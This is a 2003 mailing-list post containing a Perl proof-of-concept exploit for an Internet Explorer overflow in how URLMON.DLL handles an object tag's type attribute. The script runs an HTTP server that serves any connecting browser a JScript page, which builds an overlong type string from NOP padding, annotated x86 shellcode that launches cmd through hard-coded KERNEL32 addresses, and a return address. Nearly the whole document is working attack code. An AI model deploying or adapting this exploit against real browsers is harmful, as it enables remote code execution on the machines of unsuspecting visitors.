
IE-object tag longtype exploit


From: Alumni <alumni () ok kz>
Date: 7 Jun 2003 04:31:00 -0000



#!/usr/bin/perl

#=synopsis
#       06/06/03 - Proof of concept exploit by Sir Alumni (alumni () ok kz)
#       IE-Object longtype dynamic call overflow
#       [...]
#       url://<$shellcode><'/'x48><jmp %ptr_sh>
#       the flaw actually exists in URLMON.DLL when converting backslashes
#       to wide char,
#       this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#       [...]
#       
#       To exploit:     i)  start server perl script;
#                       ii) connect to http-service using IE/5.x.
#       Tested: IE-5.x, 6.0? on WinXP.
#       Note:   a) the shellcode size is limited up to 56 bytes;
#               b) the '$ret' may differ as well as the image base of
#                  KERNEL32.DLL;
#               c) to avoid multiple encoding the shellcode is given 'as
#                  is' with help of JScript.
#=synopsis

use IO::Socket;

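# Listening socket for the throw-away HTTP service.  No LocalAddr is given,
# so IO::Socket::INET binds every interface: any host that can reach TCP/80
# on this machine is served the payload built below.  Binding port 80 needs
# root/Administrator on most systems.  'Listen => $port' reuses the port
# number as the accept backlog (80 pending connections); harmless, but it is
# not a second port.  The script predates 'use strict'/'use warnings': every
# variable here is a package global shared with the blocks below.
$port = 80;
$server = IO::Socket::INET->new(
    LocalPort => $port,
    Type      => SOCK_STREAM,
    Reuse     => 1,
    Listen    => $port,
) or die("Couldn't create server socket\n");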


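# Raw x86 payload, 47 bytes: builds the string "cmd\0" just below the stack
# pointer, calls CreateProcessA on it, then ExitProcess.  The JScript below
# pads it with NOPs up to 56 bytes (synopsis note a).  Both absolute
# addresses are hard-coded KERNEL32 entry points and, as synopsis note (b)
# warns, belong to one specific Windows build -- they will not match other
# versions.  The bytes are interpolated into the page verbatim, with no
# encoding (synopsis note c), so this string must stay exactly as is.
$shellcode =    "\x33\xdb".             # xor ebx, ebx              (ebx = 0)
                "\x8b\xd4".             # mov edx, esp
                "\x80\xc6\xff".         # add dh, 0xFF              (dh -= 1: edx roughly esp-0x100, scratch space)
                "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63 ("cmd\x01")
                "\x64\x01".             #   ...immediate continues
                "\x88\x5a\xff".         # mov byte ptr[edx-1], bl   (bl == 0: "cmd\x01" -> "cmd\0")
                "\x8d\x42\xfc".         # lea eax, [edx-4]          (eax -> "cmd")
                "\x8b\xf5".             # mov esi, ebp
                "\x56\x52".             # push esi; push edx
                "\x53\x53\x53\x53\x53\x53".     # push ebx (x6, zero arguments)
                "\x50\x53".             # push eax; push ebx
                "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~= CreateProcessA (hard-coded, build-specific)
                "\xff\xd0".             # call eax
                "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~= ExitProcess   (hard-coded, build-specific)
                "\xff\xd0".             # call eax
                "\xcc";                 # int 3 (debug break; only reached if ExitProcess returns)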

# Single-byte NOP; the JScript repeats it to pad the payload out to 56 bytes.
$nop = chr(0x90);

# Bytes appended after the 'CCCCCCCCDDDDDDDD' marker (the 'jmp %ptr_sh' of
# the synopsis).  Written with literal backslashes so Perl passes the text
# '\xAB\x5D\x58' through unchanged and JScript decodes the escapes inside
# its own string literal.  Build-specific; see synopsis note (b).
$ret = '\xAB\x5D\x58';


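# Accept loop, one client at a time.  The request is never parsed -- any
# method, any path.  The first line that starts with CRLF (the blank line
# ending the request headers) triggers the response; a client that sends a
# bare LF never gets one.  The response embeds $shellcode raw, plus $nop and
# $ret, into a JScript that builds an <object type="..."> tag whose 'type'
# attribute is: NOP padding up to 56 bytes, the payload, 48 '/' characters,
# a 16-byte marker and $ret (see the synopsis).  Everything is served to
# whoever connects, so run this only on an isolated test network and stop it
# afterwards.  The connection is closed after one response (HTTP/1.0, no
# Content-Length), which also ends the inner readline loop.
while ($client = $server->accept()) {
    while (<$client>) {
        next unless /^(\x0D\x0A)/;

print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
<script>\r
        var mins = 56;\r
        var size = 48;\r
        var sploit = "$shellcode";\r
        var strNop = "$nop";\r
        var strObj = '<object type="';\r
        for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
        strObj += sploit;\r
        for (i=0;i<size;i++) strObj += '/';\r
        strObj += "CCCCCCCCDDDDDDDD";\r
        strObj += "$ret";\r
        strObj += '">Hello</object>';\r
        alert(strObj);\r
        document.write(strObj);\r
</script>\r
END_DATA
        close($client);
    }
}

close($server);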


